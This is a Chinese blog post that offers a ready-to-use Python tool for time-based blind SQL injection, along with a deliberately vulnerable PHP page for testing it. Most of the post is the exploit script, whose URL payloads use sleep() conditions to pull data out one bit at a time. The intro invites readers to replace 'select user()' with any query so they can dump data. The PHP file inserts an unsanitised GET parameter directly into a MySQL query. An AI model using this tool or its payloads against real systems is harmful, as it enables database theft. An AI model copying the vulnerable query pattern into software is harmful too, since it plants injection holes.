网络安全

python延迟注入

如果要爆数据啥的话就改py代码里面的select%20user(),替换为你要执行的sql即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# 延迟注入工具
import urllib2
import time
import socket
import threading
import requests

class my_threading(threading.Thread):
def __init__(self, str,x):
threading.Thread.__init__(self)
self.str = str
self.x = x
def run(self):
global res
x=self.x
j = self.str
url = "http://localhost/demo/1.php?username=root'+and+if%281=%28mid%28lpad%28bin%28ord%28mid%28%28select%20user()%29," + str(x) + ",1%29%29%29,8,0%29,"+ str(j) + ",1%29%29,sleep%282%29,0%29%23"
html = request(url)
verify = 'timeout'
if verify not in html:
res[str(j)] = 0
#print 1
else:
res[str(j)] = 1

def request(URL):
user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
req = urllib2.Request(URL, None, user_agent)
try:
request = urllib2.urlopen(req,timeout=2)
except Exception ,e:
time.sleep(2)
return 'timeout'
return request.read()

def curl(url):
try:
start = time.clock()
requests.get(url)
end = time.clock()
return int(end)
except requests.RequestException as e:
print u"访问出错!"
exit()
def getLength():
i = 0
while True:
print "[+] Checking: %s \r" %i
url = "http://localhost/demo/1.php?username=root'+and+sleep(if(length((select%20user()))="+ str(i) +",1,0))%23"
html = request(url)
verify = 'timeout'
if verify in html:
print u"[+] 数据长度为: %s" %i
return i

i = i + 1
def bin2dec(string_num):
return int(string_num, 2)

def getData(dataLength):
global res
data = ""
for x in range(dataLength):
x = x + 1
#print x
threads = []
for j in range(8):
result = ""
j = j + 1
sb = my_threading(j,x)
sb.setDaemon(True)
threads.append(sb)
#print j
for t in threads:
t.start()
for t in threads:
t.join()
#print res
tmp = ""
for i in range(8):
tmp = tmp + str(res[str(i+1)])
#print chr(bin2dec(tmp))
res = {}
result = chr(bin2dec(tmp))
print result
data = data + result
sb = None
print "[+] ok!"
print "[+] result:" + data

if __name__ == '__main__':
stop = False
res = {}
length = getLength()
getData(length)

1.php

1
<!--?php /* * 延迟注入测试 */ header("Content-type:text/html;charset=utf8"); $link = mysql_connect("localhost", "root",""); mysql_select_db("mysql", $link); mysql_set_charset("utf8"); $sql = "SELECT user FROM user where user='{$_GET['username']}'"; echo $sql; $query = mysql_query($sql); echo "这是一个没有任何回显的注入点"; ?-->
(0)
Loading收藏(0)

本文由 老D博客 作者:老D 发表,转载请注明来源!

关键词:,
SS推荐

热评文章

发表评论

*